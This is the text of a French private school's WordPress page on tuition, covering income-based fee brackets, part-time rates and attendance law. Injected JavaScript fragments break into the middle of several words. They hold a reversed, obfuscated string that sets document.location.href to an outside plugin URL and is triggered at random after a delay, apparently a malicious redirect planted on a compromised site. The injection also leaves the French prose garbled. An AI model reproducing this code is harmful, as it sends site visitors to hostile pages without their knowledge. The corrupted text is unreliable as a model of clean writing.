Combien ça coûte ?

1 – Tant que notre approche pédagogique ne sera pas reconnue et financée par la collectivité, nous assumons seul·e·s toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toutes les dépenses nécessaires au fonctionnement de l’école. C’est pourquoi, nous demandons aux familles de payer des frais de scolarité, en conscience de l’effort que cela représente.

2 – Nous proposons 5 tarifs dans une fourchette qui nous permet d’envisager la pérennité du projet. Ces tarifs dépendent du quotient familial CAF (QF) et des places disponibles pour chacun des tarifs.

3 – L’objectif de l’école est de devenir accessible à toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous financièrement et donc d’avoir des financements externes stables et pérennes autres que les frais de scolarité. Nous accueillons toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toutes les personnes et idées pouvant contribuer à cet objectif.


Frais de scolarité annuels

Pour voir ce que ça donne en cas de paiement mensuel, enlevez le dernier 0!


Comment utilisons-nous les frais de scolarité ?

Voir notre budget prévisionnel ici. 


Temps partiel

La loi française concernant l’assiduité scolaire impose qu’un enfant scolarisé participe à la toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totalité des temps scolaires obligatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toires.
Les aménagements de temps ne peuvent être envisagés que pour les enfants dans l’année de leurs 3 ans et de façon temporaire. Concernant les enfants plus âgés, la scolarité à temps partiel doit être mise en œuvre dans le cadre du projet personnel de scolarisation, en formalisant par un emploi du temps les temps de présence de l’enfant et temps de prises en charge thérapeutiques.

Le tarif d’une inscription à temps partiel est de 60 % du tarif normal.

Fièrement propulsé par WordPress | Thème : Baskerville 2 par Anders Noren.

Retour en haut ↑